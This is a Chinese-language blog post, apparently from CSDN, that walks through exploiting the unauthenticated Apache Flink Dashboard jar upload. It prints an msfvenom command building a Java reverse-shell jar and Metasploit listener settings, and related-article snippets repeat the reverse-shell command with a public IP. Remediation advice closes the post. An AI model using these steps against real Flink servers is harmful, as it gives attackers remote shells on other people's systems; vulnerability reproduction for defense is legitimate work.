Apache Flink 未授权远程代码执行检查

最新推荐文章于 2024-06-20 17:07:48 发布
最新推荐文章于 2024-06-20 17:07:48 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42299610/article/details/125160962
版权

概述
风险等级:高
缺陷描述:
Apache Flink Dashboard默认没有用户权限认证,攻击者可以通过未授权的Flink Dashboard控制台直接上传木马jar包,可远程执行任意系统命令获取服务器权限。
危害描述:
该漏洞可导致代码执行。
漏洞复现:
访问web页面。
在这里插入图片描述

利用msfovenom生成rce.jar

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.131 LPORT=4444 -f jar > rce.jar

在这里插入图片描述

配置msf监听

use exploit/multi/handler 
set payload java/shell/reverse_tcp 
set LHOST 192.168.0.131
set LPORT 4444 
show options 
run

在这里插入图片描述

在Submit New Job处上传rec.jar文件,点击submit。
在这里插入图片描述

成功getshell。
在这里插入图片描述

修复建议
1.针对Apache Flink Dashboard 设置防火墙策略;
2.禁止Dashboard对外访问或确保只对可信端点开放;
3.仅允许白名单IP进行访问,并在Web代理中增加对该服务的Digest认证,防止未授权访问。
注:该文章仅限技术学习

weixin_42299610
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Flink 1.16 功能解读.pdf
03-21
Apache Flink 1.16 功能解读
Flink 系例 之 Dashboard 安装与界面操作
不会飞的小龙人的博客
02-21 4705
前期入门讲解了需多常用算子、方法、和连接器的使用与代码示例,本文讲解如何安装 Apache Flink Dashboard 平台与界面基本操作。
Apache Flink漏洞复现
最新发布
YJ_12340的博客
06-20 1076
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)。Flink 具有监控 API,可用于查询"正在运行的jobs" 和 "最近完成的jobs" 的状态和统计信息。该监控 API 被用于 Flink 自己的dashboard,同时也可用于自定义监控工具,默认监听在8081端口。
Flink Dashboard的数据监控功能
Chary的Blog
05-08 1298
Flink Dashboard的数据监控功能
Apache Flink-环境搭建
XiangYida
07-09 803
笔者直接在docker上搭建的Flink环境 先到浏览了Flink官网的文档,最新的稳定版本是1.10.0 然后到dockerhub搜索Flink 上面直接有flink容器的docker-compose的的配置。直接copy下来。 这里我选择的版本flink:1.10.0-scala_2.11 version: "3.7" services: jobmanager: image: flink:1.10.0-scala_2.11 container_name: flink-jobmanag
Apache Flink 授权远程代码执行提权(实战)
失心少年
12-04 1227
1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个 2、生成木马 下面展示一些 。 msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar > rce.jar 3、打开msf 进行如下配置,并进行监听 下面展示一些 。 3、上传刚才生成的木马,并执行 4、看到shell已经反弹回来 5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权
Learn Flink:Overview
weixin_48813624的博客
07-13 828
Goals and Scope of this Training
Apache Flink 授权访问+远程代码执行.pdf
04-30
Apache Flink 授权访问+远程代码执行.pdf,该漏洞可以上传任意Jar包导致远程代码执行
Apache-flink 授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 授权访问任意jar包上传反弹shell
xiejingjing1#PeiQi-WIKI-POC#Apache Flink 小于1.9.1远程代码执行 CVE-2020-
07-25
漏洞描述近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞.漏洞影响国内还是很多使用 Apache Flink 的,大
Apache Flink 进阶教程(三):Checkpoint 的应用实践
qq_24095055的博客
06-27 582
文章目录Checkpoint 与 state 的关系什么是 state什么是 keyed state什么是 operator state如何在 Flink 中使用 stateCheckpoint 的执行机制Statebackend 的分类Checkpoint 执行机制详解Checkpoint 的 EXACTLY_ONCE 语义Savepoint 与 Checkpoint 的区别 本文内容出自 Apache Flink公开课系列 作者:唐云(茶干) Checkpoint 与 state 的关系 Check
Apache Flink漏洞复现(授权访问&上传jar包getshell)
qq_43244584的博客
01-26 4495
Apache Flink漏洞复现(授权访问&上传jar包getshell) 一、Flink简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 二、漏洞介绍 ​ Apache Flink Dashboard默认没有用户权限认证 ​ 攻击者可以通过授权Flink Dashboard控制台 ​ 直接上传木马jar包 ​ 可远程执行任意系统命令获取服务器权限
Flink作业提交流程
weixin_40659514的博客
10-26 623
flink作业提交流程
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 授权访问
边扯边淡
05-09 2555
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
flink
zyzn1425077119的博客
10-29 185
参考:https://blog.csdn.net/lp284558195/article/details/92798595 https://baike.baidu.com/item/flink/9078426?fr=aladdin Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 ...
Apache Flink 授权访问+远程代码执行
Adminxe的博客
11-12 1047
0x00 前言 @Adminxe 今天胖胖表哥突然扔来一个复现,那俺得瞧瞧,正好写个博客划划水,然后就引发了下面一些列的操作以及你想看到的,以及和你不想看到的文字。之前就有大佬复现过,毕竟水文和复现学习,那就来一波吧!最可恶的是,今天的MC兄没有请客喝啵啵奶茶,必须点名批评一下! 从现在fofa的搜索量来看,基本也就是国内Apache Flink 存在1500左右的站点。 有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围: <= 1.9.1(最..
apache flink是什么
海边无限的专栏
05-23 218
flink是一套分布式数据处理框架,解决有界和无界的数据流状态计算,flink被设计运行在常见的集群环境,高速处理和大规模计算。 介绍一下flink架构 处理无边界和有边界的数据 1.无边界数据流 有数据开始,没有数据结束,数据会源源不断的产生,无界数据流必须持续的处理,不可能等到所有数据都到达了再处理,因为没有结束的数据。 2.有界数据流 ...
Flink多种模式任务提交
L
05-20 1475
目录 界面方式 命令方式 测试代码如下: package wordcount import org.apache.flink.api.java.utils.ParameterTool import org.apache.flink.streaming.api.scala._ /** * Created by leboop on 2020/5/19. */ object StreamWordCount { def main(args: Array[String]): Unit = {
apache flink
07-31
Apache Flink是一个开源的流处理和批处理框架。它具有以下特点:有状态的算子、支持故障恢复、可扩展性和高性能。Flink的历史可以追溯到Stratosphere项目,该项目于2014年贡献给Apache软件基金会并更名为Apache Flink。自那时以来,Flink不断发展并发布了多个版本,包括里程碑式的重要版本0.9.0和最新的1.14.0版本。Flink在流处理方面表现出色,而Spark在批处理领域更为强大。选择学习哪个框架取决于具体的项目需求和权衡各方面的因素。无论是Spark还是Flink,它们都在相互借鉴和发展,来的发展趋势仍然不确定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weixin_42299610

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值